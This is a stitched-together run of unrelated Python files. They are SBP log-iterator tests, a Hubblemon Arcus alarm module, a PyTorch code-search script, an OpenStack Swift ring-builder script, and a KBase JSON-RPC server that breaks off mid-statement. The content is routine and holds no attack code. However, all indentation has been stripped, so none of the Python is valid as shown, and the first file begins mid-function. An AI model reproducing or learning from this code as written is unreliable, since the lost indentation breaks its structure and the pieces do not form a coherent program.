log_datafile = "./data/serial_link_log_20150310-115522-test.log.dat"
count = 0
with warnings.catch_warnings(record=True) as w:
with open(log_datafile, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
for msg, metadata in fetch_next(log):
assert type(metadata['time']) == six.text_type
assert isinstance(msg, SBP) or issubclass(type(msg), SBP)
count += 1
warnings.simplefilter("always")
assert len(w) == 0
assert count == 2650
def test_json_log():
"""
JSON log iterator sanity tests.
"""
_json_log(conventional=False, fetch_next = lambda x : next(x))
_json_log(conventional=True, fetch_next = lambda x : x)
def _non_utf8_json_log(conventional, fetch_next):
log_datafile = "./data/serial_link_non_utf8.log.dat"
with warnings.catch_warnings(record=True) as w:
with open(log_datafile, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
for _, _ in fetch_next(log):
pass
warnings.simplefilter("always")
assert len(w) == 1
def test_non_utf8_json_log():
"""
JSON log iterator sanity tests.
"""
_non_utf8_json_log(conventional=False, fetch_next = lambda x : next(x))
_non_utf8_json_log(conventional=True, fetch_next = lambda x : x)
def _msg_print(conventional, fetch_next):
log_datafile = "./data/serial_link_log_20150428-084729.log.dat"
with open(log_datafile, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
with warnings.catch_warnings(record=True) as w:
for _, _ in fetch_next(log):
pass
warnings.simplefilter("always")
# Check for warnings.
assert len(w) == 1
assert issubclass(w[0].category, RuntimeWarning)
assert str(w[0].message).startswith('Bad message parsing for line')
@pytest.mark.xfail
def test_msg_print():
"""
"""
_msg_print(conventional=False, fetch_next = lambda x : next(x))
_msg_print(conventional=True, fetch_next = lambda x : x)
def udp_handler(data):
class MockRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
assert data == self.request[0].strip()
return MockRequestHandler
class MockServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
def udp_server(handler):
server = MockServer(("localhost", 0), handler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return (ip, port)
def test_udp_logger():
msg = SBP(1, 2, 3, b'abc', 4)
handler = udp_handler(msg.pack())
ip, port = udp_server(handler)
with UdpLogger(ip, port) as udp:
udp(msg)
def _rolling_json_log(conventional, fetch_next):
"""
Rolling JSON log iterator sanity tests.
"""
# Duration of test
test_interval = 6
# Rotating interval
r_interval = 2
try:
with tempfile.NamedTemporaryFile(mode='w', delete=False) as tf:
#print tf.name
with RotatingFileLogger(tf.name, when='S', interval=r_interval) as log:
t0 = time.time()
t = time.time()
msg = SBP(0x10, 2, 3, b'abc\n', 4)
msgs = []
while t - t0 < test_interval:
log(msg, delta=t-t0, timestamp=t)
if t - t0 <= r_interval:
msgs.append(msg)
t = time.time()
i = 0
with open(tf.name, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
for msg, _ in fetch_next(log):
assert isinstance(msg, MsgPrintDep)
assert msg.text == b"abc\n"
i += 1
assert i > 0
assert i <= len(msgs)
except Exception:
raise
finally:
os.unlink(tf.name)
@pytest.mark.slow
def test_rolling_json_log():
"""
Rolling JSON log iterator sanity tests.
"""
_rolling_json_log(conventional=False, fetch_next = lambda x : next(x))
_rolling_json_log(conventional=True, fetch_next = lambda x : x)
|
arcus_alarm.py
|
#
# Hubblemon - Yet another general purpose system monitor
#
# Copyright 2015 NAVER Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import socket, fnmatch, pickle, sys, os, threading
import arcus_mon.settings
import arcus_mon.arcus_driver.arcus_util
from arcus_mon.arcus_driver.arcus_util import zookeeper
hubblemon_path = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(hubblemon_path)
import common.settings
import common.core
class arcus_alarm:
def __init__(self):
self.name = 'arcus'
self.sec_interval = 5 # 5 sec interval
self.node_cloud_map = {}
self.node_cloud_map_init()
def _node_cloud_map_init(self, addr):
zoo = zookeeper(addr)
nodes = zoo.get_arcus_node_all()
for node in nodes:
self.node_cloud_map[node.ip + ":" + node.port] = node.code
def node_cloud_map_init(self):
print('# cloud map init')
threads = []
for addr in common.settings.arcus_zk_addrs:
th = threading.Thread(target = self._node_cloud_map_init, args = (addr,))
th.start()
threads.append(th)
for th in threads:
th.join()
print('# cloud map init done')
def get_cloud_of_node(self, name, port):
try:
ip = socket.gethostbyname(name)
except Exception as e:
print(e)
print('# exception: %s' % name)
return None
key = ip + ':' + port
if key not in self.node_cloud_map:
# retry with ip:0 # implicit define
key = ip + ':0'
if key not in self.node_cloud_map:
return None
return self.node_cloud_map[key]
def select_cloud_conf(self, cloud, map):
ret = {}
if 'default' in map:
ret = map['default'].copy()
# exact
if cloud in map:
# overwrite
for k, v in map[cloud].items():
ret[k] = v
else:
# wild card match
for key, value in map.items():
# overwrite if match like linegame-*
if fnmatch.fnmatch(cloud, key):
for k, v in value.items():
ret[k] = v
return ret
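# Illustration of select_cloud_conf (cloud names and values are hypothetical):
# with map = {'default': {'cmd_get': 1000},
#             'linegame-*': {'cmd_get': 5000},
#             'linegame-main': {'cmd_set': 300}}
# select_cloud_conf('linegame-main', map) starts from a copy of 'default' and,
# because an exact key exists, overwrites only with 'linegame-main', yielding
# {'cmd_get': 1000, 'cmd_set': 300}. A cloud such as 'linegame-sub' has no
# exact key, so the wildcard 'linegame-*' entry applies instead, yielding
# {'cmd_get': 5000}.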
def get_conf(self, client, instance): # client: machine name, instance: arcus port
if not instance.isnumeric(): # TODO: ignore prefix
return (None, None, None)
cloud = self.get_cloud_of_node(client, instance)
if cloud is None:
print('## None type of node cloud mapping %s, %s' % (client, instance))
return (None, None, None)
# select exact conf
abs_conf = self.select_cloud_conf(cloud, arcus_mon.settings.alarm_conf_absolute)
lambda_conf = self.select_cloud_conf(cloud, arcus_mon.settings.alarm_conf_lambda)
instance_id = '%s:%s-%s' % (cloud, client, instance)
return (instance_id, abs_conf, lambda_conf)
|
main.py
|
import os
import sys
import random
import traceback
import numpy as np
import math
from math import log
import argparse
from datashape.coretypes import real
random.seed(42)
import threading
import codecs
from tqdm import tqdm
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(message)s")
import torch
from torch import optim
import torch.nn.functional as F
from utils import cos_np, normalize, dot_np, sent2indexes
from configs import get_config
from data_loader import load_dict, CodeSearchDataset, load_vecs, save_vecs
import models
class CodeSearcher:
def __init__(self, conf):
self.conf=conf
self.path = conf['workdir']
self.vocab_methname = load_dict(self.path+conf['vocab_name'])
self.vocab_apiseq=load_dict(self.path+conf['vocab_api'])
self.vocab_tokens=load_dict(self.path+conf['vocab_tokens'])
self.vocab_desc=load_dict(self.path+conf['vocab_desc'])
self.codevecs=[]
self.codebase= []
self.codebase_chunksize=2000000
self.valid_set = None
##### Data Set #####
def load_codebase(self):
"""load codebase
codefile: h5 file that stores raw code
"""
logger.info('Loading codebase (chunk size={})..'.format(self.codebase_chunksize))
if not self.codebase: #empty
codes=codecs.open(self.path+self.conf['use_codebase']).readlines()
#use codecs to read in case of encoding problem
for i in range(0,len(codes),self.codebase_chunksize):
self.codebase.append(codes[i:i+self.codebase_chunksize])
### Results Data ###
def load_codevecs(self):
logger.debug('Loading code vectors..')
if not self.codevecs: # empty
"""read vectors (2D numpy array) from a hdf5 file"""
reprs=load_vecs(self.path+self.conf['use_codevecs'])
for i in range(0,reprs.shape[0], self.codebase_chunksize):
self.codevecs.append(reprs[i:i+self.codebase_chunksize])
##### Model Loading / saving #####
def save_model(self, model, epoch):
if not os.path.exists(self.path+'models/'):
os.makedirs(self.path+'models/')
torch.save(model.state_dict(), self.path+'models/epo%d.h5' % epoch)
def load_model(self, model, epoch):
assert os.path.exists(self.path+'models/epo%d.h5'%epoch), 'Weights at epoch %d not found' % epoch
model.load_state_dict(torch.load(self.path+'models/epo%d.h5' % epoch))
##### Training #####
def train(self, model):
model.train()
log_every = self.conf['log_every']
valid_every = self.conf['valid_every']
save_every = self.conf['save_every']
batch_size = self.conf['batch_size']
nb_epoch = self.conf['nb_epoch']
train_set = CodeSearchDataset(self.path,
self.conf['train_name'],self.conf['name_len'],
self.conf['train_api'],self.conf['api_len'],
self.conf['train_tokens'],self.conf['tokens_len'],
self.conf['train_desc'],self.conf['desc_len'])
data_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=self.conf['batch_size'],
shuffle=True, drop_last=True, num_workers=1)
val_loss = {'loss': 1., 'epoch': 0}
for epoch in range(self.conf['reload']+1, nb_epoch):
itr = 1
losses=[]
for names, apis, toks, good_descs, bad_descs in data_loader:
names, apis, toks, good_descs, bad_descs = [tensor.to(self.device) for tensor in [names, apis, toks, good_descs, bad_descs]]
loss = model(names, apis, toks, good_descs, bad_descs)
losses.append(loss.item())
optimizer.zero_grad()
loss.backward()
optimizer.step()
if itr % log_every ==0:
logger.info('epo:[%d/%d] itr:%d Loss=%.5f'%(epoch, nb_epoch, itr, np.mean(losses)))
losses=[]
itr = itr + 1
# if epoch and epoch % valid_every == 0:
# logger.info("validating..")
# acc1, mrr, map, ndcg = self.eval(model,1000,1)
if epoch and epoch % save_every == 0:
self.save_model(model, epoch)
##### Evaluation #####
def eval(self, model, poolsize, K):
"""
simple validation in a code pool.
@param: poolsize - size of the code pool, if -1, load the whole test set
"""
def ACC(real,predict):
sum=0.0
for val in real:
try:
index=predict.index(val)
except ValueError:
index=-1
if index!=-1:
sum=sum+1
return sum/float(len(real))
def MAP(real,predict):
sum=0.0
for id,val in enumerate(real):
try:
index=predict.index(val)
except ValueError:
index=-1
if index!=-1:
sum=sum+(id+1)/float(index+1)
return sum/float(len(real))
def MRR(real,predict):
sum=0.0
for val in real:
try:
index=predict.index(val)
except ValueError:
index=-1
if index!=-1:
sum=sum+1.0/float(index+1)
return sum/float(len(real))
def NDCG(real,predict):
dcg=0.0
idcg=IDCG(len(real))
for i,predictItem in enumerate(predict):
if predictItem in real:
itemRelevance=1
rank = i+1
dcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(rank+1))
return dcg/float(idcg)
def IDCG(n):
idcg=0
itemRelevance=1
for i in range(n):
idcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(i+2))
return idcg
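# Worked example for the metrics above (values chosen for illustration):
# with real=[0] and predict=[3, 0], the relevant item is found at rank 2,
# so DCG = (2**1 - 1) * (log(2)/log(3)) ~= 0.631, IDCG(1) = 1.0 and
# NDCG ~= 0.631; for the same pair ACC is 1.0 and MRR is 0.5.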
if self.valid_set is None: #load test dataset
self.valid_set=CodeSearchDataset(self.path,
self.conf['valid_name'],self.conf['name_len'],
self.conf['valid_api'],self.conf['api_len'],
self.conf['valid_tokens'],self.conf['tokens_len'],
self.conf['valid_desc'],self.conf['desc_len'])
data_loader = torch.utils.data.DataLoader(dataset=self.valid_set, batch_size=poolsize,
shuffle=True, drop_last=True, num_workers=1)
model.eval()
accs,mrrs,maps,ndcgs=[],[],[],[]
for names, apis, toks, descs, _ in tqdm(data_loader):
names, apis, toks, descs = [tensor.to(self.device) for tensor in [ names, apis, toks, descs]]
code_repr=model.code_encoding(names, apis, toks)
for i in range(poolsize):
desc=descs[i].expand(poolsize,-1)
desc_repr=model.desc_encoding(desc)
n_results = K
sims = F.cosine_similarity(code_repr, desc_repr).data.cpu().numpy()
negsims=np.negative(sims)
predict=np.argsort(negsims)#predict = np.argpartition(negsims, kth=n_results-1)
predict = predict[:n_results]
predict = [int(k) for k in predict]
real=[i]
accs.append(ACC(real,predict))
mrrs.append(MRR(real,predict))
maps.append(MAP(real,predict))
ndcgs.append(NDCG(real,predict))
logger.info('ACC={}, MRR={}, MAP={}, nDCG={}'.format(np.mean(accs),np.mean(mrrs),np.mean(maps),np.mean(ndcgs)))
return np.mean(accs),np.mean(mrrs),np.mean(maps),np.mean(ndcgs)
##### Compute Representation #####
def repr_code(self,model):
model.eval()
vecs=None
use_set = CodeSearchDataset(self.conf['workdir'],
self.conf['use_names'],self.conf['name_len'],
self.conf['use_apis'],self.conf['api_len'],
self.conf['use_tokens'],self.conf['tokens_len'])
data_loader = torch.utils.data.DataLoader(dataset=use_set, batch_size=1000,
shuffle=False, drop_last=False, num_workers=1)
for names,apis,toks in data_loader:
names, apis, toks = [tensor.to(self.device) for tensor in [names, apis, toks]]
reprs = model.code_encoding(names,apis,toks).data.cpu().numpy()
vecs=reprs if vecs is None else np.concatenate((vecs, reprs),0)
vecs = normalize(vecs)
save_vecs(vecs,self.path+self.conf['use_codevecs'])
return vecs
def search(self,model,query,n_results=10):
model.eval()
desc=sent2indexes(query, self.vocab_desc)#convert desc sentence into word indices
desc = np.expand_dims(desc, axis=0)
desc= torch.from_numpy(desc).to(self.device)
desc_repr=model.desc_encoding(desc).data.cpu().numpy()
codes=[]
sims=[]
threads=[]
for i, codevecs_chunk in enumerate(self.codevecs):
t = threading.Thread(target=self.search_thread, args = (codes,sims,desc_repr, codevecs_chunk,i,n_results))
threads.append(t)
for t in threads:
t.start()
for t in threads:#wait until all sub-threads finish
t.join()
return codes,sims
def search_thread(self,codes,sims,desc_repr,codevecs,i,n_results):
#1. compute code similarities
chunk_sims=dot_np(normalize(desc_repr),codevecs)
#2. choose the top K results
negsims=np.negative(chunk_sims[0])
maxinds = np.argpartition(negsims, kth=n_results-1)
maxinds = maxinds[:n_results]
chunk_codes=[self.codebase[i][k] for k in maxinds]
chunk_sims=chunk_sims[0][maxinds]
codes.extend(chunk_codes)
sims.extend(chunk_sims)
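# Note on the top-K selection in search_thread above:
# np.argpartition(negsims, kth=n_results-1) only guarantees that the
# n_results smallest negated similarities (i.e. the largest similarities)
# occupy the first n_results slots, in no particular order. For example,
# with chunk_sims[0] = [0.1, 0.9, 0.5, 0.7] and n_results=2,
# maxinds[:2] is some ordering of indices {1, 3}.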
def parse_args():
parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
parser.add_argument('--model', type=str, default='JointEmbeder', help='model name')
parser.add_argument("--mode", choices=["train","eval","repr_code","search"], default='train',
help="The mode to run. The `train` mode trains a model;"
" the `eval` mode evaluates models on a test set; "
" The `repr_code/repr_desc` mode computes vectors"
" for a code snippet or a natural language description with a trained model.")
parser.add_argument('--gpu_id', type=int, default=0, help='GPU ID')
parser.add_argument("--verbose",action="store_true", default=True, help="Be verbose")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
device = torch.device(f"cuda:{args.gpu_id}" if torch.cuda.is_available() else "cpu")
conf = get_config()
searcher = CodeSearcher(conf)
searcher.device = device
##### Define model ######
logger.info('Build Model')
model = getattr(models, args.model)(conf)#initialize the model
if conf['reload']>0:
searcher.load_model(model, conf['reload'])
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=conf['lr'])
if args.mode=='train':
searcher.train(model)
elif args.mode=='eval':
# evaluate for a particular epoch
searcher.eval(model,1000,10)
elif args.mode=='repr_code':
vecs=searcher.repr_code(model)
elif args.mode=='search':
#search code based on a desc
searcher.load_codevecs()
searcher.load_codebase()
while True:
try:
query = input('Input Query: ')
n_results = int(input('How many results? '))
except Exception:
print("Exception while parsing your input:")
traceback.print_exc()
break
codes,sims=searcher.search(model, query,n_results)
zipped=zip(codes,sims)
results = '\n\n'.join(map(str, zipped))  # combine the results into a single string to return
print(results)
|
swift_rings.py
|
#!/usr/bin/env python
# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from optparse import OptionParser
from os.path import exists
from swift.cli.ringbuilder import main as rb_main
import pickle
import sys
import threading
import json
import copy
USAGE = "usage: %prog -f <swift_ring.contents>"
DEVICE_KEY = "%(ip)s:%(port)d/%(device)s"
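# For example, a host dict such as {'ip': '10.0.0.1', 'port': 6000, 'device': 'sdb'}
# (illustrative values) renders DEVICE_KEY as "10.0.0.1:6000/sdb"; this is the key
# used below to match inventory hosts against devices already in the ring.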
class RingValidationError(Exception):
pass
def create_buildfile(build_file, part_power, repl, min_part_hours,
update=False, data=None, validate=False):
if update:
# build file exists, so lets just update the existing build file
if not data:
data = get_build_file_data(build_file)
if data is None:
data = {}
if repl != data.get('replicas') and not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file,
"set_replicas", repl])
if min_part_hours != data.get('min_part_hours') and not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file,
"set_min_part_hours", min_part_hours])
if part_power != data.get('part_power'):
raise RingValidationError('Part power cannot be changed! '
'You must rebuild the ring if you need '
'to change it.\nRing part power: %s '
'Inventory part power: %s'
%(data.get('part_power'), part_power))
elif not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file, "create",
part_power, repl, min_part_hours])
def change_host_weight(build_file, host_search_str, weight):
run_and_wait(rb_main, ["swift-ring-builder", build_file, "set_weight",
host_search_str, weight])
def remove_host_from_ring(build_file, host):
run_and_wait(rb_main, ["swift-ring-builder", build_file, "remove",
host])
def update_host_in_ring(build_file, new_host, old_host, validate=False):
if new_host.get('zone', 0) != old_host['zone']:
devstr = DEVICE_KEY % new_host
raise RingValidationError('Cannot update zone on %s, this can only be '
'done when the drive is added' % (devstr))
if new_host.get('region', 1) != old_host['region']:
devstr = DEVICE_KEY % new_host
raise RingValidationError('Cannot update region on %s, this can only '
'be done when the drive is added' % (devstr))
try:
r_ip = new_host.get('repl_ip', new_host['ip'])
r_port = new_host.get('repl_port', new_host['port'])
weight = new_host.get('weight')
if r_ip != old_host['replication_ip'] or \
r_port != old_host['replication_port']:
host_d = {'r_ip': r_ip, 'r_port': r_port}
host_d.update(new_host)
host_str = "%(ip)s:%(port)dR%(r_ip)s:%(r_port)d/%(device)s" % host_d
if not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file,
"set_info", DEVICE_KEY % new_host,
host_str])
except Exception as ex:
raise RingValidationError(ex)
if weight != old_host['weight'] and not validate:
change_host_weight(build_file, DEVICE_KEY % new_host, weight)
def add_host_to_ring(build_file, host, validate=False):
host_str = ""
try:
if host.get('region') is not None:
host_str += 'r%(region)d' % host
host_str += "z%d" % (host.get('zone'))
host_str += "-%(ip)s:%(port)d" % host
if host.get('repl_ip'):
r_ip = host['repl_ip']
r_port = host.get('repl_port', host['port'])
host_str += "R%s:%d" % (r_ip, r_port)
elif host.get('repl_port'):
r_ip = host.get('repl_ip', host['ip'])
r_port = host['repl_port']
host_str += "R%s:%d" % (r_ip, r_port)
host_str += "/%(device)s" % host
weight = host.get('weight')
except Exception as ex:
raise RingValidationError(ex)
if not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file, 'add',
host_str, str(weight)])
def run_and_wait(func, *args):
t = threading.Thread(target=func, args=args)
t.start()
return t.join()
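# run_and_wait (above) executes swift-ring-builder's main() in a short-lived
# thread and joins it immediately, presumably so that any sys.exit() inside
# rb_main raises SystemExit only in that worker thread instead of terminating
# this script; that rationale is an assumption, it is not documented here.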
def has_section(conf, section):
return bool(conf.get(section))
def check_section(conf, section):
if not has_section(conf, section):
print("Section %s doesn't exist" % (section))
sys.exit(2)
def get_build_file_data(build_file):
build_file_data = None
if exists(build_file):
try:
with open(build_file) as bf_stream:
build_file_data = pickle.load(bf_stream)
except Exception as ex:
print("Error: failed to load build file '%s': %s" % (build_file,
ex))
build_file_data = None
return build_file_data
def build_ring(build_name, repl, min_part_hours, part_power, hosts, validate=False):
# Create the build file
build_file = "%s.builder" % (build_name)
build_file_data = get_build_file_data(build_file)
update = build_file_data is not None
create_buildfile(build_file, part_power, repl, min_part_hours, update,
data=build_file_data, validate=validate)
old_hosts = {}
if update:
for i, dev in enumerate(build_file_data['devs']):
if dev is not None:
old_hosts[DEVICE_KEY % dev] = i
for host in hosts:
host_key = DEVICE_KEY % host
if host_key in old_hosts:
old_host = build_file_data['devs'][old_hosts[host_key]]
update_host_in_ring(build_file, host, old_host,
validate=validate)
old_hosts.pop(host_key)
else:
add_host_to_ring(build_file, host, validate=validate)
if old_hosts and not validate:
# There are still old hosts, these hosts must've been removed
for host in old_hosts:
remove_host_from_ring(build_file, host)
# Rebalance ring
if not validate:
if not hosts:
run_and_wait(rb_main, ["swift-ring-builder", build_file, "write_ring"])
else:
run_and_wait(rb_main, ["swift-ring-builder", build_file, "rebalance"])
def main(setup):
# load the json file
try:
with open(setup) as json_stream:
_contents_file = json.load(json_stream)
except Exception as ex:
print("Failed to load json string %s" % (ex))
return 1
hosts = _contents_file['drives']
kargs = {'validate': True, 'hosts': hosts}
ring_call = [ _contents_file['builder_file'],
_contents_file['repl_number'],
_contents_file['min_part_hours'],
_contents_file['part_power']]
try:
build_ring(*ring_call, **kargs)
except RingValidationError as ex:
print(ex)
return 2
# If the validation passes lets go ahead and build the rings.
kargs.pop('validate')
build_ring(*ring_call, **kargs)
if __name__ == "__main__":
parser = OptionParser(USAGE)
parser.add_option("-f", "--file", dest="setup",
help="Specify the swift ring contents file.", metavar="FILE")
options, args = parser.parse_args(sys.argv[1:])
if options.setup and not exists(options.setup):
print("Swift ring contents file not found")
parser.print_help()
sys.exit(1)
sys.exit(main(options.setup))
|
ContigFilteringPSDServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ContigFilteringPSD'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from ContigFilteringPSD.ContigFilteringPSDImpl import ContigFilteringPSD
impl_ContigFilteringPSD = ContigFilteringPSD(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['ContigFilteringPSD.filter_contigs_async'] = ['ContigFilteringPSD', 'filter_contigs']
async_check_methods['ContigFilteringPSD.filter_contigs_check'] = ['ContigFilteringPSD', 'filter_contigs']
sync_methods['ContigFilteringPSD.filter_contigs'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
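# For reference, AsyncJobServiceClient._call() posts a JSON-RPC 1.1 body of
# roughly this shape (values are illustrative):
#   {"method": "KBaseJobService.run_job", "params": [run_job_params],
#    "version": "1.1", "id": "0123456789", "context": {...}}
# with the auth token passed in the AUTHORIZATION header.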
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is the same as call() except that the return value is a
Python object instead of a JSON string. It is mainly useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ContigFilteringPSD'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ContigFilteringPSD.filter_contigs,
name='ContigFilteringPSD.filter_contigs',
types=[dict])
self.method_authentication['ContigFilteringPSD.filter_contigs'] = 'required'
self.auth_client = biokbase.nexus.Client(
